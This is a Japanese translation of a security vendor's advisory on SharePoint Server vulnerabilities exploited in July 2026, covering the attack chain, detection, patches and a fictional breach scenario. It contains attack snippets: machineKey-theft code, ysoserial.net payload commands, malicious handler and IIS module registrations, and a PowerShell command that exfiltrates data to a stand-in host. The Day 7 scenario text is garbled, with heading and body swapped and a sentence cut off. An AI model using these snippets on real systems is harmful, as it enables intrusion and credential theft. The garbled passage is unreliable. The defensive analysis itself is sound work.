Webリクエストからドメイン侵害へ:2026年7月のSharePoint攻撃を読み解く

はじめに

Microsoft SharePoint Serverは、企業のコラボレーションおよびコンテンツ管理プラットフォームとして最も広く導入されている製品の一つであり、ビジネス上重要な文書やワークフロー、組織データを一元管理するリポジトリとして機能しています。SharePointはActive Directory、SQL Server、Microsoft IISといった技術と密接に連携しているため、企業環境内で信頼された立場を占めることが少なくありません。その結果、SharePointに影響する脆弱性は単一のWebアプリケーションにとどまらない深刻な影響を及ぼす可能性があり、攻撃者に組織のインフラ全体を侵害する足がかりを与えかねません。

2026年7月、MicrosoftおよびアメリカのCybersecurity and Infrastructure Security Agency(CISA)は、オンプレミス版Microsoft SharePoint Serverに影響する複数の重大な脆弱性が実際に悪用されていることを公表し、確認しました。これらの脆弱性には認証バイパス、不適切な入力検証、安全でないデシリアライズの欠陥が含まれており、これらを組み合わせることで不正アクセス、リモートコード実行、持続的なアクセス、そして横展開が可能になります。複数の脆弱性がCISAの既知悪用脆弱性(KEV)カタログに追加されたことは、セキュリティ更新プログラムの適用と脅威ハンティング活動の緊急性を浮き彫りにしています。

エグゼクティブサマリー

2026年7月14日、アメリカのCybersecurity and Infrastructure Security Agency(CISA)は、Microsoft SharePoint Serverの複数の重大な脆弱性が実際に悪用されていることを確認しました。実際に悪用が確認されたCVE—CVE-2026-32201CVE-2026-45659CVE-2026-56164—は、サポート対象のすべてのオンプレミス版SharePoint(サブスクリプションエディション、2019、2016)に影響します。脅威アクターはこれらの弱点を連鎖させることで、認証をバイパスし、任意のコードを実行し、Webシェルを展開し、ASP.NETデータの署名・暗号化に使われるIISマシンキーを窃取できます。攻撃者はすでにspinstall0.aspxなどのWebシェルを使い、web.configからmachineKeyの情報を抽出しています。

同じ更新サイクルで、MicrosoftはCVE-2026-55040(JWT認証バイパス)、CVE-2026-58644(未認証デシリアライズによるRCE)、CVE-2026-50522(同じく未認証デシリアライズによるRCE)も公表しました。CVE-2026-55040は公表時点で実際の攻撃は確認されていませんが、これら3件はいずれも未認証でアクセス可能な攻撃対象領域を大きく拡大するため、先手を打ってパッチを適用する必要があります。本記事では、信頼できる情報源をもとに、これらの脆弱性、攻撃チェーン、影響、緩和策、検知方法、そして現実的なケーススタディを総合的に分析します。

CVEサマリー

CVE CISA KEV追加日 CVSS 3.1(情報源) CWE CISA対応期限 状況
CVE-2026-32201 2026年4月14日 6.5 Medium(Microsoft) CWE-20 不適切な入力検証 2026年4月28日 実際に悪用
CVE-2026-45659 2026年7月1日 8.8 High(Microsoft) CWE-502 デシリアライズ 2026年7月4日 実際に悪用
CVE-2026-56164 2026年7月14日 9.8 Critical(NVD)、Microsoft CNA: 5.3 Medium CWE-306 認証の欠如 2026年7月17日 実際に悪用
CVE-2026-55040 KEV未登録 9.1 Critical(Microsoft) CWE-1390 脆弱な認証 該当なし 悪用未確認、直ちにパッチ適用を
CVE-2026-58644 2026年7月16日 9.8 Critical(Microsoft/NVD) CWE-502 デシリアライズ 2026年7月19日 実際に悪用
CVE-2026-50522 KEV未登録(2026年7月17日時点) 9.8 Critical(Microsoft) CWE-502 デシリアライズ 該当なし 重大、直ちにパッチ適用を

2026年7月のSharePointセキュリティ更新プログラムは、オンプレミス版Microsoft SharePoint Server導入環境に影響する6件の重大な脆弱性に対応しています。うち3件—CVE-2026-32201CVE-2026-45659CVE-2026-56164—はCISAによって実際に悪用されていることが確認され、既知悪用脆弱性(KEV)カタログに追加されており、直ちに修復が必要です。残る3件—CVE-2026-55040CVE-2026-58644CVE-2026-50522—は未認証でアクセス可能な攻撃対象領域を大幅に拡大するため、優先的にパッチを適用すべきです(なお、CVE-2026-58644は2026年7月16日にCISA KEVに追加されました)。

なぜ重要なのか

SharePointは単なるコラボレーションプラットフォームではなく、組織にとって最も価値のある資産への信頼されたゲートウェイです。多くの企業環境では、機密性の高い業務文書、知的財産、財務記録、顧客情報を保存すると同時に、Active Directory、SQL Server、Exchangeなどの重要インフラと深く連携しています。この接続性の高さが、SharePointを脅威アクターにとって価値の高い標的にしています。

インターネットに公開されたSharePointサーバーの侵害に成功すれば、攻撃者は単一のアプリケーションへのアクセス以上のものを手にすることになります。それは認証バイパス、リモートコード実行、認証情報の窃取、権限昇格、持続的なアクセス、企業ネットワーク全体への横展開を伴う多段階攻撃の初期足がかりとなり得ます。そこから攻撃者はバックエンドのデータベース、ドメインリソース、その他の重要システムへアクセスする可能性があり、侵害全体の影響がさらに大きくなります。

2026年7月に発覚した一連の脆弱性は、複数の弱点を連鎖させることで、単純なWebリクエストが企業全体の完全な侵害へと変貌し得ることを示しています。したがって組織は、SharePointを重要なセキュリティ境界として扱い、大規模な侵害のリスクを低減するために、迅速なパッチ適用、継続的な監視、能動的な脅威ハンティング、多層防御の各対策を優先すべきです。

影響を受ける対象

影響を受ける製品とバージョン

  • Microsoft SharePoint Server サブスクリプションエディション
  • Microsoft SharePoint Server 2019(Standard・Enterprise)
  • Microsoft SharePoint Server 2016(Enterprise)

SharePoint OnlineおよびMicrosoft 365はMicrosoftが管理しているため、影響を受けません。

最もリスクの高い組織

リスク要因 重要な理由
インターネットに公開されたSharePoint 未認証の攻撃者が悪用対象のエンドポイントに直接到達できる。
パッチ適用が遅れている 公開されたPoC(概念実証)パターンが存在し、実際に悪用が行われている。
マルチテナント/共有ファーム 侵害されたWebアプリ1つでテナント横断的にコンテンツが露出しかねない。
機密データのリポジトリ SharePointは知的財産、個人情報、財務記録、法務データをホストしている。
AD/SQLとの信頼された連携 ファームアカウントが侵害されると横展開が可能になる。
政府機関・規制業種 KEV登録により拘束力のあるパッチ適用期限が課される。

脅威アクターのプロファイル

CISAは特定のグループ名を挙げずに「悪意あるサイバー脅威アクター」による実際の悪用があるとしています。観測された戦術・技術・手順(TTP)—SharePointの悪用、Webシェルの展開、machineKeyの窃取、IISモジュールによる永続化—は、以下と一致しています。

  • 政府機関や防衛関連企業への長期的なアクセスを狙う国家支援型アクター。
  • 初期アクセスブローカーを利用して価値の高い標的を侵害するランサムウェア関連グループ。
  • データ窃取、ビジネスメール詐欺、知的財産の窃取に注力するサイバー犯罪グループ。

未認証でのアクセス、RCE、持続的な永続化が組み合わさっていることで、この一連の脆弱性はスパイ活動・金銭目的の攻撃者双方にとって魅力的な標的となっています。

SharePoint Serverの技術概要

オンプレミスファームのアーキテクチャ

Image

Microsoft SharePoint Serverは通常、拡張性、高可用性、集中管理型のコラボレーションサービスを実現するために、多層構成のファームアーキテクチャとして導入されます。典型的なSharePointファームは、Webコンテンツの配信、サービスアプリケーションの処理、組織データの保存、認証管理を社内ネットワーク全体で連携して行う複数のサーバーロールで構成されています。

このアーキテクチャは、ユーザーリクエストを処理するWebフロントエンド(WFE)サーバー、SharePointサービスや管理機能をホストするアプリケーションサーバー、コンテンツと構成データを保存するSQL Serverデータベース、ID・アクセス管理を提供するActive Directoryサービスを中心に構築されています。これらのコンポーネントは常時通信し合い、文書管理、検索、ワークフロー自動化、コラボレーション機能を支えています。

ファームの各コンポーネントは相互に高度に連携しているため、適切なセグメンテーションとセキュリティ対策が施されていない場合、公開された1台のWebフロントエンドサーバーが侵害されるだけで、攻撃者に機密データベースや管理サービス、その他の内部リソースへの経路を与えかねません。

次の図は、典型的なSharePoint Serverのオンプレミスファームアーキテクチャと、その主要コンポーネント間の関係を示しています。

主要コンポーネント

  • Webフロントエンド(WFE)サーバー: IISとSharePoint Webアプリケーションを実行し、ユーザーリクエストを処理してHTTP/HTTPSトラフィックを配信。
  • アプリケーションサーバー: SharePointサービスアプリケーション、バックグラウンドジョブ、検索サービス、Central Administrationをホスト。
  • SQL Serverクラスター: コンテンツデータベース、構成データベース、サービスアプリケーションデータベースを保存。
  • Active Directory Domain Services(AD DS): 認証、認可、グループメンバーシップ、ID解決を提供。
  • SharePoint Central Administration: SharePointファームの設定・監視・管理を行う専用管理インターフェース。

AMSI連携

Microsoft SharePoint Serverは、SPRequesterFilteringModuleというIISのリクエストフィルタリングコンポーネントを通じてAntimalware Scan Interface(AMSI)と連携しています。このコンポーネントは、IIS処理パイプラインのonBeginRequest段階で受信したHTTPリクエストを検査します。この連携により、悪意あるコンテンツがSharePointアプリケーションコードに到達する前に検知・遮断できるようになり、Webシェルの展開や悪意あるペイロードの実行、その他のサーバー側攻撃のリスクを低減します。

リクエストを受信すると、SPRequesterFilteringModuleはそのリクエストデータをAMSI対応のアンチマルウェアプロバイダーに送信して解析します。悪意あるコンテンツが検出された場合、SharePointは直ちに処理を中断し、HTTP 400(Bad Request)応答を返すことで、ペイロードがアプリケーションに到達するのを防ぎます。

SharePoint Server サブスクリプションエディション バージョン25H1以降、MicrosoftはRequest Body Scanを導入し、AMSIの検査範囲をHTTPヘッダーだけでなくリクエスト本文全体にまで拡張しました。この機能強化により、POSTリクエスト、ファイルアップロード、シリアライズされたオブジェクトなど、SharePoint悪用キャンペーンで一般的に使われる攻撃手法に埋め込まれた悪意あるペイロードの検出精度が大きく向上します。

Request Body Scanのモード
モード 説明
Off リクエスト本文のスキャンが無効。AMSIによる検査が限定的になり、ペイロードベースの攻撃に対する防御が弱くなる。
Balanced Mode Microsoftが定義する機微なSharePointエンドポイントに加え、管理者が定義したカスタムエンドポイントをスキャン。セキュリティとパフォーマンスのバランスを取る。
Full Mode 管理者が明示的に除外したエンドポイントを除き、SharePointアプリケーション全体に対して受信リクエストとリクエスト本文をすべてスキャン。最も高いレベルの保護を提供。
Image

悪用の仕組み

Image

第1段階:偵察

攻撃者は次のような方法でオンプレミス版SharePointの標的を特定します。

  • Shodan/CensysによるSharePoint固有のHTTPヘッダーや/_layouts/15/パスの検索。
  • 証明書透明性ログとDNSの列挙。
  • 初期アクセスブローカーが販売する漏洩済み認証情報やVPNアクセス。
  • ソーシャルエンジニアリング、または信頼済みIP範囲にSharePointを公開しているパートナーポータル。

第2段階:初期侵害

攻撃者は脆弱なSharePointエンドポイントに細工したHTTPリクエストを送信します。対象のCVEによっては、未認証でも実行可能な場合や、低レベルのサイトメンバーシップのみを必要とする場合があります。

  • CVE-2026-56164:未認証でサイトユーザーまたは管理者への権限昇格。
  • CVE-2026-45659:サイトメンバーとして認証済みでのデシリアライズによるRCE。
  • CVE-2026-58644:未認証でのデシリアライズによるRCE。
  • CVE-2026-55040:既知のユーザーになりすますためのJWT認証バイパス。
  • CVE-2026-32201:制御をバイパスしたり、特権エンドポイントに到達したりするために使われるスプーフィングのプリミティブ。

第3段階:Webシェルの展開

コード実行権限を得た後、攻撃者は通常、SharePointのWebアプリケーションディレクトリにASP.NET製のWebシェルを設置します。よく見られる設置場所は次のとおりです。

C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx
C:\\inetpub\\wwwroot\\wss\\VirtualDirectories\\80\\_layouts\\info3.aspx

実際に観測されたWebシェルは、検知を回避するために、パスワード保護付きアクセス、XOR暗号化されたコマンド文字列、ファイルアップロード機能、Cookieベースの認証などを使用しています。

第4段階:IISマシンキーの窃取

攻撃者はWebシェルまたはリフレクションを利用した.NETコードを使い、ASP.NETのmachineKey設定を読み取ります。窃取される鍵にはvalidationKeyとdecryptionKeyが含まれます。

// Machine-key extraction via reflection
Configuration config = WebConfigurationManager.OpenWebConfiguration("/");
MachineKeySection section = (MachineKeySection)config.GetSection("system.web/machineKey");

// Access private fields
Type t = typeof(MachineKeySection);
string validationKey = (string)t.GetField("_ValidationKey", BindingFlags.NonPublic | BindingFlags.Instance).GetValue(section);
string decryptionKey = (string)t.GetField("_DecryptionKey", BindingFlags.NonPublic | BindingFlags.Instance).GetValue(section);

// Exfiltrate
Response.Headers["X-TXT-NET"] = validationKey + "|" + decryptionKey;

machineKeyの窃取は重大な意味を持ちます。これにより攻撃者はViewStateやフォーム認証チケットを偽造できるようになり、元となった脆弱性がパッチで修正された後も、アクセスを維持できてしまうためです。

第5段階:ViewStateの偽造と永続化

窃取した鍵を使い、攻撃者はysoserial.netやカスタムシリアライザーを用いて悪意あるViewStateペイロードを作成します。偽造されたViewStateはサーバー自身の鍵で署名・暗号化されるため、サーバーは疑いなくそれをデシリアライズしてしまいます。

// ysoserial.net ViewState gadget chain
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "powershell -enc ..." -o base64

// Attacker signs/encrypts with stolen keys and sends in __VIEWSTATE
POST /vulnerable.aspx HTTP/1.1
Host: sharepoint.company.com
__VIEWSTATE=...forged signed payload...

あるいは、攻撃者はapplicationHost.configに登録した悪意あるIISモジュールをインストールします。ネイティブモジュールはすべてのw3wp.exeプロセスにロードされ、リクエストを傍受したり、Cookieやヘッダーにコマンドを隠したりでき、再起動やパッチ適用後も生き残ります。

第6段階:横展開

ファームサービスアカウントには、SQL Serverロールのdbcreatorおよびsecurityadmin、さらにすべてのSharePointデータベースに対するdb_ownerの権限が付与されています。攻撃者はこのアカウントを利用して、次のことを行います。

  • 任意のコンテンツデータベースの照会や改変。
  • 構成データベースからの追加の認証情報の抽出。
  • ファームアカウントの権限を利用したActive Directoryへのピボット。
  • 同一ネットワークセグメント内の他のサーバーへの移動。

この段階に至ると、侵害は単一のSharePoint Webフロントエンドから、より広い企業環境全体へと拡大しています。

脆弱性の詳細とソースレベルの分析

CVE-2026-32201 — 不適切な入力検証

この欠陥により、未認証の攻撃者がネットワーク経由でスプーフィングを行うことが可能になります。根本原因は、HTTPヘッダー、クエリパラメータ、フォーム値といった攻撃者が制御可能な入力の検証が不十分であることにあります。

// Conceptual vulnerable pattern
string referer = Request.Headers["Referer"];
if (!string.IsNullOrEmpty(referer) && referer.Contains("SignOut.aspx"))
{
    // Trusts client-controlled header
    return ExecutePrivilegedOperation(Request);
}

正しい実装パターンは、セッションやトークンから認証済みユーザーのIDを検証し、すべての入力を厳格な許可リストと照合することです。

CVE-2026-45659 — 信頼できないデータのデシリアライズ

Site Member権限を持つ認証済みの攻撃者が、細工したシリアライズ済みペイロードを送信します。SharePointは脆弱な.NETシリアライザーを使ってこれをデシリアライズし、IISワーカープロセス内で任意のコードを実行してしまいます。

// Vulnerable deserialization pattern
BinaryFormatter formatter = new BinaryFormatter();
object result = formatter.Deserialize(Request.InputStream);
// Attacker gadget chain: ObjectDataProvider -> ProcessStartInfo -> cmd.exe

根本原因は、型の制約なしに攻撃者が制御するデータから任意の型をインスタンス化してしまうデシリアライザーを使用していることにあります。

CVE-2026-56164 — 重要機能に対する認証の欠如

SharePointの重要な機能が、適切な認証なしにアクセス可能な状態になっています。これにより、未認証の攻撃者がサイトユーザーまたは管理者レベルへと権限を昇格させることが可能になります。

// Conceptual vulnerable pattern
[AllowAnonymous]
public class AdminController : Controller
{
    [HttpPost]
    public ActionResult AddSiteAdmin(string userName)
    {
        // No [Authorize] or site-admin check
        SPWeb.CurrentWeb.SiteAdministrators.Add(userName);
        return Json(new { success = true });
    }
}

CVE-2026-55040 — JWTトークン認証バイパス

リモートの未認証攻撃者が、JWT検証パイプラインを操作することで認証をバイパスします。攻撃者は事前に標的のユーザー識別子を把握している必要があります。Rapid7は、これを未認証RCEを実現する2つの脆弱性の連鎖の一部として特定しており、対になるRCEの脆弱性は2026年8月のパッチサイクルで対応される見込みです。

// Vulnerable JWT validation pattern
var tokenHandler = new JwtSecurityTokenHandler();
var validationParams = new TokenValidationParameters
{
    ValidateIssuer = false,
    ValidateAudience = false,
    ValidateLifetime = false,
    RequireSignedTokens = false   // Accepts alg=none
};
var principal = tokenHandler.ValidateToken(token, validationParams, out _);

CVE-2026-58644 — 未認証デシリアライズによるRCE

この重大な欠陥はCVE-2026-45659に類似していますが、認証なしでアクセス可能な点が異なります。攻撃者は脆弱なエンドポイントに細工したネットワークリクエストを送信し、SharePointサーバー上で任意のコードを実行します。

// Unauthenticated vulnerable path
public class PublicEndpoint : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        if (context.Request.HttpMethod == "POST")
        {
            LosFormatter formatter = new LosFormatter();
            object state = formatter.Deserialize(context.Request.InputStream);
            // Gadget chain executes code
        }
    }
}

根本原因のまとめ

CVE 脆弱性の分類 ソースレベルの根本原因 悪用による結果
CVE-2026-32201 不適切な入力検証 攻撃者が制御可能なヘッダー/パラメータを信頼 スプーフィング、認証バイパスのプリミティブ
CVE-2026-45659 デシリアライズによるRCE 攻撃者が制御する型を受け入れる安全でない.NETデシリアライザー w3wpとしての認証済みRCE
CVE-2026-56164 認証の欠如 重要エンドポイントに認証/認可の実施が欠如 権限昇格
CVE-2026-55040 JWT検証バイパス トークンの署名・クレームの検証が不十分 認証バイパス、未認証RCEチェーン
CVE-2026-58644 デシリアライズによるRCE 認証なしでアクセス可能な安全でないデシリアライザー w3wpとしての未認証RCE
CVE-2026-50522 デシリアライズによるRCE 未認証エンドポイント内の安全でないデシリアライザー w3wpとしての未認証RCE

影響を受けるバージョンとパッチ

製品 脆弱なバージョン 2026年7月ビルド KB記事
SharePoint Server サブスクリプションエディション 16.0.19725.20384より前 16.0.19725.20434 KB 5002882
SharePoint Server 2019 16.0.10417.20153より前 16.0.10417.20175 KB 5002883、KB 5002885
SharePoint Server 2016 16.0.5556.1005より前 16.0.5561.1001 KB 5002891、KB 5002892

組織は、Rapid7が特定したCVE-2026-55040の連鎖のうち、対となるRCEコンポーネントを修正すると見られるMicrosoftの2026年8月の更新プログラムにも注意を払うべきです。

検知と脅威ハンティング

初期侵入の兆候

  • DisplayMode=Editを伴う、/_layouts/15/ToolPane.aspxまたは/_layouts/16/ToolPane.aspxへのHTTP POSTリクエスト。
  • /_layouts/SignOut.aspxを指す偽装されたRefererヘッダー。
  • 予期しないIP範囲、地域、ユーザーエージェント文字列からのリクエスト。
  • HTTP 200応答の後にw3wp.exeから起動される不審な子プロセス。

プロセスおよびファイルシステムの兆候

  • w3wp.exeがcmd.exe、powershell.exe、csc.exeを起動する。
  • -EncodedCommand、-enc、-ec、bypass、unrestrictedを伴うPowerShellの実行。
  • TEMPLATE\LAYOUTSまたはinetpub\wwwroot配下に新しく作成された.aspx、.txt、.dll、.jsファイル。
  • w3wp.exe内での.NETリフレクション活動(Assembly.Load、System.Reflection.Emit)。

IISおよび永続化の兆候

  • Microsoft-IIS-Configuration/Operational内のイベントID 29(新しいモジュールの追加)。
  • イベントID 50(IIS構成の変更)。
  • イベントID 2282(モジュールの読み込み失敗)。
  • applicationHost.configまたはweb.config内の新しいグローバルモジュール。

修復と強化

直ちに実施すべき対応

  1. SharePoint Server向けに2026年7月14日にリリースされたMicrosoftのセキュリティ更新プログラムを適用する。
  2. ファーム内のすべてのサーバーでパッチのインストール状況を確認する。
  3. すべてのWebアプリケーションでAMSI連携を有効にし、可能であればRequest Body Scan ModeをFullに設定する。
  4. 侵害の痕跡を捜索し、対処する。
  5. 環境がクリーンであることを確認した後にのみ、IISマシンキーをローテーションする。

ネットワークの強化

  • SharePointサーバーをインターネットに直接公開しない。
  • 外部からのアクセスが必要な場合は、認証と検査機能を備えたレイヤー7リバースプロキシを利用する。
  • SharePoint Central Administrationへの外部からのアクセスを遮断する。
  • ファームおよびデータベース間の通信を必要なシステムのみに制限する。
  • SQL Serverにはカスタムポートを使用し、Webフロントエンドからのデフォルトポートへのアクセスを遮断する。

AMSIの設定

# PowerShell (SPSE 25H1+)
$webApp = Get-SPWebApplication -Identity “http://spwfe”
$webApp.AMSIBodyScanMode = 2  # 0=Off, 1=Balanced, 2=Full
$webApp.Update()

# Central Administration:
# Security -> AMSI Configuration -> Select web app -> Enable -> Full Mode

ログ記録と監視

  • 完全なリクエストヘッダーと応答コードを含むIIS Advanced Loggingを有効にする。
  • IIS、Windowsイベント、SharePoint ULSログをSIEMに転送する。
  • w3wp.exeがシェルを起動したり、コードをコンパイルしたりした場合にアラートを出す。
  • 新しいIISグローバルモジュールやmachineKey設定の変更が検出された場合にアラートを出す。

影響評価

データの露出

SharePointの文書、サイト、データベース、機密性の高い業務情報への不正アクセス。知的財産、顧客データ、社内記録が窃取される恐れがあります。

リモートコード実行

攻撃者は脆弱なSharePointサーバー上で任意のコードを実行できます。
これにより、Webシェルやマルウェア、追加の攻撃ツールの展開が可能になります。

永続化

窃取されたマシンキー、Webシェル、悪意あるIISモジュールにより、長期にわたるアクセスが維持される可能性があります。
システムが適切に調査されない場合、パッチ適用後も永続化が残存する恐れがあります。

権限昇格

攻撃者は権限を昇格させ、SharePoint環境の管理権限を掌握できます。
権限、構成、セキュリティ設定の変更が可能になります。

横展開

侵害されたSharePointサーバーは、SQL Server、Active Directory、その他の社内システムへのアクセスに利用される可能性があります。
攻撃者は企業ネットワーク全体へ侵害を拡大させる恐れがあります。

ビジネスへの影響

データ窃取、サービス停止、ランサムウェアの展開、業務のダウンタイムが発生する可能性があります。
コンプライアンス違反、金銭的損失、レピュテーション低下につながる恐れもあります。

SharePointの侵害に成功すると、SharePointファーム全体の完全な制御や、より広範な企業侵害に発展する可能性があります。組織は、迅速なパッチ適用、脅威ハンティング、継続的な監視を優先すべきです。

仮想的な侵害シミュレーション:オペレーション「FarmKey」

以下のシナリオは、本レポートで説明した脆弱性に基づく架空の、想定上の侵害シミュレーションです。実際のインシデントの報告ではありません。2026年7月のSharePoint関連CVE群を攻撃者がどのように連鎖させ、現実的なキルチェーンを構築し得るかを示すものです。

標的のプロファイル

  • 組織:オンプレミス版SharePoint Server 2019ファームを運用する中堅の地域金融サービス企業。
  • ファーム構成:WFE2台(10.0.20.10、10.0.20.11)、アプリケーションサーバー1台(10.0.20.20)、SQLクラスター(10.0.20.30)、CORP.LOCALドメインに参加。
  • 外部への露出:IISリバースプロキシ経由で公開されたSharePoint Webアプリケーション。パートナー向けエクストラネットのためNTLMおよびフォームベース認証が有効。
  • 防御対策:Windows Defender AVが有効、AMSI Request Body ScanはBalancedに設定、アウトバウンド通信はHTTP/HTTPSのみに制限、SharePointサーバーにはEDR未導入。

侵害のタイムライン

Day -30 — 初期アクセスの調達

脅威アクターは、公開リポジトリからCVE-2026-32201の動作するPoCを入手します。Shodanと証明書透明性ログを利用し、標的組織の外部公開SharePoint URLを特定、HTTP応答ヘッダーおよび_layouts/15/..のソース参照から、ビルドバージョン(SharePoint Server 2019、2026年3月パッチレベル以前)を確認します。

GET /_layouts/15/... HTTP/1.1
Host: sharepoint.corp.local
User-Agent: Mozilla/5.0
Day -3 — 偵察と脆弱性の確認

アクターは、CVE-2026-32201の影響を受けることが判明している未認証エンドポイントに細工したリクエストを送信します。Refererヘッダーと不正なクエリ文字列を操作することで、フロントエンドの認可チェックをバイパスし、内部のリスト構造メタデータを含む200 OK応答を受け取ります。これにより標的が脆弱であることが確認され、内部のサイトコレクション構造が露出します。

POST /_api/web/lists/GetByTitle('Documents') HTTP/1.1
Host: sharepoint.corp.local
Referer: https://sharepoint.corp.local/_layouts/15/blank.htm
X-RequestDigest: 0x0000000000000000
Day 0 — 初期侵害

連鎖したペイロードを用い、アクターは文書ライブラリのエンドポイントにシリアライズされたオブジェクトをアップロードすることでCVE-2026-45659を悪用します。サーバーが型フィルタリングなしにBinaryFormatterでペイロードをデシリアライズしてしまうため、443番ポート経由でアクターのC2サーバーへリバースシェルが起動されます。このシェルはIISアプリケーションプールのID(iisapppool\sharepoint)のコンテキストで動作し、ローカル権限は限定的ですが、SharePointの構成ファイルは読み取れます。

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o base64 -c "powershell -enc SQBFAFgAIAA..."
Day 0、+2時間後 — Webシェルの展開

アプリケーションプールのリサイクルを乗り越え、単純なファイルベースの検知を回避するために、アクターは侵害済みのWFEを利用し、DLLとしてコンパイルしたカスタムASP.NET HTTPハンドラーをGACに展開します。このハンドラーはweb.configの<system.web><httpHandlers>配下に登録され、特定のUser-Agent文字列を含むリクエストにのみ応答します。これにより、新たにデシリアライズをトリガーすることなく対話的なアクセスが可能になります。

<add verb="*" path="AssetHandler.axd" type="Corp.Web.AssetHandler, Corp.Web.Extensions" validate="false" />
Day 1 — machineKeyの窃取による権限昇格

アクターは両方のWFEにあるSharePointルートのweb.configからmachineKeyセクションを窃取します。ファームではViewStateの互換性のため全ノードで同一の検証キー・暗号化キーが使われているため、アクターはysoserial.netを用いてオフラインで偽造ViewStateペイロードに署名・暗号化を施せるようになります。これにより、低権限のWebシェルは、任意のWFE上でアプリケーションプールアカウントとして動作する任意コード実行のプリミティブへと実質的に変貌します。

# Extract keys via webshell or direct file read
Get-Content C:\inetpub\wwwroot\wss\VirtualDirectories\80\web.config | Select-String "machineKey"
Day 2 — 悪意あるIISモジュールによる永続化

アクターは%WINDIR%\System32\inetsrvにネイティブIISモジュールのDLLを書き込み、applicationHost.configにグローバル登録します。このモジュールはすべての受信リクエストを検査し、__FarmAuthという名前のCookieに特定の値が含まれている場合、新しいワーカープロセスを起動して埋め込まれたシェルコードを実行します。このモジュールはIISパイプラインレベルでロードされるため、SharePointアプリケーションプールが再起動しても生き残り、SharePoint固有のログには表示されません。

<add name="FarmAuthModule" image="%windir%\System32\inetsrv\FarmAuthNative.dll" />
Day 3 — 横展開と認証情報の窃取

アプリケーションプールのサービスアカウントを利用し、アクターはSharePointの構成データベースを照会し、コンテンツクロールおよびファーム管理に使われているサービスアカウントを特定します。ファームアカウントはSQLクラスターに対する制約付き委任を持っているため、アクターは制御下のSMBリスナーへのHTTPリクエストを通じてNTLMのチャレンジ/レスポンスを取得し、それをデータベースサーバーへリレーします。これにより、顧客文書のメタデータや複数の社内プロジェクトサイトへの読み取りアクセスが得られます。

Day 5 — データのステージングと窃取

アクターは、/sites/archive2024という名前のサイトコレクション配下にある隠し文書ライブラリに、機密文書とリストのエクスポートを圧縮アーカイブとしてステージングします。ファームの通常の出力に紛れ込ませるため、ファイル名には無害な拡張子(.log、.tmp)が付けられます。データの持ち出しは、DLPのサイズ閾値を回避するためにアーカイブを5MB単位のチャンクに分割し、侵害された正規のクラウドストレージのエンドポイントへHTTPS経由で行われます。

Invoke-WebRequest -Uri https://compromised-cdn.example.com/upload -Method POST -Body $chunk -Headers @{"X-Log-Type"="debug"}

Day 7 — 認証を無効化し、すべてのファームサービスアカウントの認証情報をリセットし、フォレンジックイメージングを開始します。発見と封じ込め

管理者がアプリケーションサーバーで異常なCPUスパイクに気づき、w3wp.exeから未知のIPへのアウトバウンドHTTPS接続を観測します。IISモジュールの手動レビューにより、不正なFarmAuthNative.dllが発見されます。セキュリティチームは両方のWFEをネットワークから隔離し、フォームベース

イベントのタイムライン

Image
  • 2026年5月:MicrosoftがCVE-2026-45659を含むSharePoint向けセキュリティ更新プログラムをリリース。当初は「悪用の可能性は低い」と評価されていた。
  • 2026年7月1日:悪用の証拠が確認されたため、CISAがCVE-2026-45659を既知悪用脆弱性カタログに追加。
  • 2026年7月14日(パッチチューズデー):MicrosoftがCVE-2026-56164CVE-2026-55040CVE-2026-58644CVE-2026-50522などの修正プログラムを公開。
  • 2026年7月14日(CISAアラート):CISAが、実際に行われているSharePointの悪用(CVE-2026-32201、45659、56164)について警告するアドバイザリを公開し、直ちにパッチを適用するよう促す。
  • 2026年7月15日~20日:Cisco Talosなど業界各社がSharePoint向けのIDSルール更新を公表。防御側はCISAのガイダンスに基づき脅威ハンティングを開始。

戦略的教訓と今後の展望

  • 迅速なパッチ対応が不可欠:攻撃者はパッチ公開からわずか数日でSharePointの脆弱性を悪用していました。
  • 多層防御が重要:AMSIのフルモードスキャン、ネットワークセグメンテーション、最小権限アクセスにより被害範囲を縮小できます。
  • 可視性とログ記録が重要:Webシェルの作成、プロセスの起動、ネットワーク通信は、適切なテレメトリがあればいずれも検知可能です。
  • レガシーなオンプレミスシステムには専用のリソースが必要:SharePoint Onlineは影響を受けませんが、オンプレミスファームは依然として価値の高い標的であり続けています。
  • 複数の脅威が交わる:国家支援型アクターとサイバー犯罪アクターの双方が、スパイ活動とランサムウェアによる金銭的利益という異なる目的のために、同じ脆弱性を悪用しています。

結論

2026年7月に発覚したSharePoint Serverの一連の脆弱性は、オンプレミスのMicrosoftコラボレーション環境にとって、緊急性が高く、信頼性のある、実際に悪用されている脅威です。CVE-2026-32201CVE-2026-45659CVE-2026-56164のCISA KEVへの追加は、実際の悪用が行われていることを裏付けており、連邦政府機関に対して拘束力のある修復要件を課しています。CVE-2026-55040CVE-2026-58644CVE-2026-50522についても、未認証でアクセス可能な攻撃対象領域を拡大するものであり、先手を打ってパッチを適用する必要があります。

SharePointサーバーへの直ちのパッチ適用と強化は、選択の余地がない対応です。管理者は、パッチ未適用のSharePointファームは現在進行形で標的にされていると想定し、緊急対応を加速させるべきです。長期的には、組織はアーキテクチャとインシデント対応のプレイブックを見直し、多段階攻撃を見越しておく必要があります。迅速なパッチ適用、能動的な脅威ハンティング、ネットワークセグメンテーション、強靭な復旧計画を組み合わせた多層防御こそが、こうした脅威に先んじるために不可欠です。

翻訳元: https://www.resecurity.com/blog/article/from-web-request-to-domain-compromise-understanding-the-july-2026-sharepoint-attacks

ソース: resecurity.com